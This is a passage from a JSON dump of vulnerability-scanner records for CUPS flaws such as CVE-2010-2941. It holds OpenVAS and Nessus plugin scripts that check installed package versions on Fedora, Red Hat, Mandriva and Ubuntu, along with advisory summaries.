script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-17641\");\n script_cve_id(\"CVE-2010-2941\");\n script_name(\"Fedora Update for cups FEDORA-2010-17641\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : 
tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.4~11.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T11:48:56", "bulletinFamily": "scanner", "description": "Check for the Version of cups", "modified": "2017-12-13T00:00:00", "published": "2010-11-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870352", "id": "OPENVAS:870352", "title": "RedHat Update for cups RHSA-2010:0811-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for cups RHSA-2010:0811-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Common UNIX Printing System (CUPS) provides a portable printing layer\n for UNIX operating systems.\n\n A use-after-free flaw was found in the way the CUPS server parsed Internet\n Printing Protocol (IPP) packets. A malicious user able to send IPP requests\n to the CUPS server could use this flaw to crash the CUPS server or,\n potentially, execute arbitrary code with the privileges of the CUPS server.\n (CVE-2010-2941)\n\n A possible privilege escalation flaw was found in CUPS. An unprivileged\n process running as the \"lp\" user (such as a compromised external filter\n program spawned by the CUPS server) could trick the CUPS server into\n overwriting arbitrary files as the root user. (CVE-2010-2431)\n\n Red Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\n reporting the CVE-2010-2941 issue.\n\n Users of cups are advised to upgrade to these updated packages, which\n contain backported patches to correct these issues. After installing this\n update, the cupsd daemon will be restarted automatically.\";\n\ntag_affected = \"cups on Red Hat Enterprise Linux (v. 
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-October/msg00034.html\");\n script_id(870352);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-04 12:09:38 +0100 (Thu, 04 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2010:0811-01\");\n script_cve_id(\"CVE-2010-2431\", \"CVE-2010-2941\");\n script_name(\"RedHat Update for cups RHSA-2010:0811-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.7~18.el5_5.8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.3.7~18.el5_5.8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.3.7~18.el5_5.8\", 
rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.3.7~18.el5_5.8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.3.7~18.el5_5.8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:55", "bulletinFamily": "scanner", "description": "Check for the Version of cups", "modified": "2017-12-22T00:00:00", "published": "2010-11-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831255", "id": "OPENVAS:1361412562310831255", "title": "Mandriva Update for cups MDVSA-2010:233 (cups)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for cups MDVSA-2010:233 (cups)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were discovered and corrected in cups:\n\n Cross-site request forgery (CSRF) vulnerability in the web interface\n in CUPS, allows remote attackers to hijack the authentication of\n administrators for requests that change settings (CVE-2010-0540).\n \n ipp.c in cupsd in CUPS 1.4.4 and earlier does not properly allocate\n memory for attribute values with invalid string data types, which\n allows remote attackers to cause a denial of service (use-after-free\n and application crash) or possibly execute arbitrary code via a\n crafted IPP request (CVE-2010-2941).\n \n The updated packages have been patched to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"cups on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-11/msg00027.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831255\");\n script_version(\"$Revision: 8228 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 08:29:52 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-23 15:30:07 +0100 (Tue, 23 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:233\");\n script_cve_id(\"CVE-2010-0540\", \"CVE-2010-2941\");\n script_name(\"Mandriva Update for cups MDVSA-2010:233 (cups)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version 
of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", 
rpm:\"lib64cups2-devel~1.4.3~3.1mdv2010.1\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:00", "bulletinFamily": "unix", "description": "Emmanuel Bouillon discovered that CUPS did not properly handle certain Internet Printing Protocol (IPP) packets. A remote attacker could use this flaw to cause a denial of service or possibly execute arbitrary code. In the default installation in Ubuntu 8.04 LTS and later, attackers would be isolated by the CUPS AppArmor profile.", "modified": "2010-11-04T00:00:00", "published": "2010-11-04T00:00:00", "id": "USN-1012-1", "href": "https://usn.ubuntu.com/1012-1/", "title": "CUPS vulnerability", "type": "ubuntu", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:11:18", "bulletinFamily": "scanner", "description": "Emmanuel Bouillon discovered that CUPS did not properly handle certain\nInternet Printing Protocol (IPP) packets. A remote attacker could use\nthis flaw to cause a denial of service or possibly execute arbitrary\ncode. In the default installation in Ubuntu 8.04 LTS and later,\nattackers would be isolated by the CUPS AppArmor profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-12-01T00:00:00", "published": "2010-11-05T00:00:00", "id": "UBUNTU_USN-1012-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50490", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : cups, cupsys vulnerability (USN-1012-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1012-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50490);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/12/01 13:19:06\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"USN\", value:\"1012-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : cups, cupsys vulnerability (USN-1012-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Emmanuel Bouillon discovered that CUPS did not properly handle certain\nInternet Printing Protocol (IPP) packets. A remote attacker could use\nthis flaw to cause a denial of service or possibly execute arbitrary\ncode. In the default installation in Ubuntu 8.04 LTS and later,\nattackers would be isolated by the CUPS AppArmor profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1012-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-bsd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cups-ppdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsddk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-bsd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcups2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:libcups2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupscgi1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupscgi1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsdriver1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsdriver1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsimage2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsimage2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsmime1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsmime1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsppdc1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsppdc1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsys2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsys2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsys2-gnutls10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2010/11/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|9\\.10|10\\.04|10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 9.10 / 10.04 / 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"cupsys\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"cupsys-bsd\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"cupsys-client\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsimage2\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsys2\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsys2-dev\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif 
(ubuntu_check(osver:\"6.06\", pkgname:\"libcupsys2-gnutls10\", pkgver:\"1.2.2-0ubuntu0.6.06.20\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"cupsys\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"cupsys-bsd\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"cupsys-client\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"cupsys-common\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libcupsimage2\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libcupsys2\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libcupsys2-dev\", pkgver:\"1.3.7-1ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-bsd\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-client\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-common\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-dbg\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cups-ppdc\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsddk\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsys\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsys-bsd\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsys-client\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"cupsys-common\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", 
pkgname:\"cupsys-dbg\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcups2\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcups2-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupscgi1\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupscgi1-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsdriver1\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsdriver1-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsimage2\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsmime1\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsmime1-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsppdc1\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libcupsppdc1-dev\", pkgver:\"1.4.1-5ubuntu2.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-bsd\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-client\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-common\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-dbg\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cups-ppdc\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsddk\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys\", 
pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys-bsd\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys-client\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys-common\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"cupsys-dbg\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcups2\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcups2-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupscgi1\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupscgi1-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsdriver1\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsdriver1-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsimage2\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsmime1\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsmime1-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsppdc1\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libcupsppdc1-dev\", pkgver:\"1.4.3-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups-bsd\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"cups-client\", pkgver:\"1.4.4-6ubuntu2.2\")) flag++;\nif 